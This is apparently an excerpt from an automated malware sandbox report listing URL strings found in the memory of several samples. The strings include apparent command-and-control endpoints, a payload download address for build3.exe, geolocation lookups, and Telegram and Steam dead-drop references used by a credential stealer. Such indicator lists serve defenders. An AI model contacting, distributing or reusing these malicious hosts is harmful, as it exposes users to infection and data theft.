                Source: aafg31.exe, 00000015.00000002.617633602.000000AEF327A000.00000004.00000010.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://jp.imgjeoighw.com/sts/image.jpg
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://jp.imgjeoighw.com/sts/image.jpgO
                Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ss.apjeoighw.com/
                Source: aafg31.exe, 00000015.00000003.539122814.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ss.apjeoighw.com/blob:
                Source: aafg31.exe, 00000015.00000003.617256768.000001E292290000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.643560384.000001E292292000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ss.apjeoighw.com/check/?sid=436336&key=3f9d01718af2d5daf3c654f2052d5bc7
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2901D2000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.642437211.000001E292275000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.642437211.000001E292246000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ss.apjeoighw.com/check/safe
                Source: aafg31.exe, 00000015.00000002.642437211.000001E292275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ss.apjeoighw.com/check/safe)
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2900FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ss.apjeoighw.com/check/safe1B
                Source: aafg31.exe, 00000015.00000002.642437211.000001E292275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ss.apjeoighw.com/check/safe3
                Source: aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.563228419.000001E2901A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ss.apjeoighw.com:80/check/?sid=436234&key=2cef0d99b721939135d08fea0dcaba52G_
                Source: aafg31.exe, 00000015.00000003.539647639.000001E2901A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ss.apjeoighw.com:80/check/safe
                Source: aafg31.exe, 00000015.00000003.616407141.000001E2922EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://toobussy.com/
                Source: D804.exe, 00000013.00000003.474950384.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
                Source: D804.exe, 00000013.00000003.475054823.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
                Source: D804.exe, 00000013.00000003.475244622.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
                Source: D804.exe, 00000013.00000003.475283762.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
                Source: D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
                Source: D804.exe, 00000013.00000003.475323189.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
                Source: D804.exe, 00000013.00000003.475504479.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
                Source: D804.exe, 00000013.00000003.475541394.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
                Source: D804.exe, 00000013.00000003.475594980.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
                Source: D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.636070288.000000000320F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe
                Source: D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$run
                Source: D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$runZT
                Source: D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0
                Source: D804.exe, 00000013.00000002.636070288.000000000320F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exel
                Source: D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/files/1/build3.exerunb10
                Source: D804.exe, 00000010.00000002.619429561.0000000000808000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php
                Source: D804.exe, 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000010.00000002.619429561.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C
                Source: D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=true
                Source: D804.exe, 00000013.00000002.619178225.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C&first=trueQ58
                Source: D804.exe, 00000010.00000002.619429561.0000000000852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806Cg
                Source: D804.exe, 00000010.00000002.619429561.0000000000891000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.php?pid=F4B58C92E14ED1DB6A495C4F011280Nkx%
                Source: D804.exe, 00000010.00000002.619429561.0000000000808000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.0000000000680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/raud/get.phpep
                Source: B46F.exe, 0000001A.00000002.489404633.0000000000687000.00000004.00000020.00020000.00000000.sdmp, A170.exe, 0000001D.00000003.488086932.0000000000939000.00000004.00000020.00020000.00000000.sdmp, A170.exe, 0000001D.00000002.490407985.0000000000939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
                Source: D804.exe, 00000013.00000003.452681314.0000000000647000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/?
                Source: A170.exe, 0000001D.00000002.490407985.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, A170.exe, 0000001D.00000003.488086932.0000000000939000.00000004.00000020.00020000.00000000.sdmp, A170.exe, 0000001D.00000002.490407985.0000000000939000.00000004.00000020.00020000.00000000.sdmp, 913F.exe, 00000025.00000002.514716181.0000000000667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
                Source: D804.exe, 00000010.00000003.452471512.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json#&
                Source: A170.exe, 0000001D.00000002.490407985.00000000008D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json1
                Source: A170.exe, 0000001D.00000002.490407985.00000000008D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonA
                Source: D804.exe, 00000006.00000002.450438133.0000000000707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonG.S
                Source: D804.exe, 00000013.00000002.619178225.00000000005F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonV
                Source: D804.exe, 00000013.00000003.452681314.0000000000647000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonq
                Source: 913F.exe, 00000025.00000002.514716181.0000000000667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsons
                Source: D804.exe, 00000010.00000002.619429561.0000000000808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonyY&$
                Source: D804.exe, 00000013.00000003.452681314.0000000000647000.00000004.00000020.00020000.00000000.sdmp, D804.exe, 00000013.00000002.619178225.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/u
                Source: build2.exe, 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll
                Source: aafg31.exe, 00000015.00000003.616407141.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616875927.000001E2922D3000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://messenger.com/
                Source: aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y-/l/0
                Source: aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0
                Source: aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/ZZnKfYusN8Z.js?_nc_x=Ij3Wp8lg5Kz
                Source: aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yB/l/0
                Source: aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0
                Source: aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/yWg6mkUCjYR.js?_nc_x=Ij3Wp8lg5Kz
                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617144495.000001E292287000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.643446636.000001E29228C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yI/r/Ib90vcVxYzI.js?_nc_x=Ij3Wp8lg5Kz
                Source: aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yK/l/0
                Source: aafg31.exe, 00000015.00000003.616407141.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617256768.000001E292290000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.536338668.000001E292285000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616875927.000001E2922D3000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922D6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.536309898.000001E292289000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558924559.000001E292285000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617144495.000001E292287000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/camCPYrr6r7.js?_nc_x=Ij3Wp8lg5Kz
                Source: aafg31.exe, 00000015.00000003.617144495.000001E292287000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.643446636.000001E29228C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyx
                Source: aafg31.exe, 00000015.00000003.559161122.000001E2901D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/_tJ17sGyxOX.js?_nc_x=Ij3Wp8lg5Kz
                Source: aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yP/l/0
                Source: aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/Kp9IMjEGN_T.js?_nc_x=Ij3Wp8lg5Kz
                Source: aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/sczXDyPA0UL.js?_nc_x=Ij3Wp8lg5Kz
                Source: aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/A-4As8UDAZ8.js?_nc_x=Ij3Wp8lg5Kz
                Source: aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644310592.000001E292380000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.616407141.000001E2922D0000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yq/l/0
                Source: aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/v75M7CPu9-P.js?_nc_x=Ij3Wp8lg5Kz
                Source: aafg31.exe, 00000015.00000003.616139527.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.617336652.000001E292381000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.558548528.000001E2922B9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.559523108.000001E29229C000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593963921.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.593189980.000001E2922F9000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E2922CB000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.560301255.000001E29229E000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.535524540.000001E292293000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.595112195.000001E2922FA000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.592730628.000001E292381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3i7M54/yx/l/en_US/LsRZeEzcd6B.js?_nc_x=Ij3Wp8lg5Kz
                Source: build2.exe, 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199508624021
                Source: build2.exe, 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199508624021update.zipopenopen_NULL%s
                Source: build2.exe, 00000018.00000002.478487593.00000000008C8000.00000040.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/looking_glassboeL
                Source: build2.exe, 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/looking_glassbot
                Source: build2.exe, 00000018.00000002.478126519.0000000000840000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/looking_glassbotlookataddon.zipMozilla/5.0
                Source: D804.exe, 00000013.00000002.619178225.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-tnzomMj6
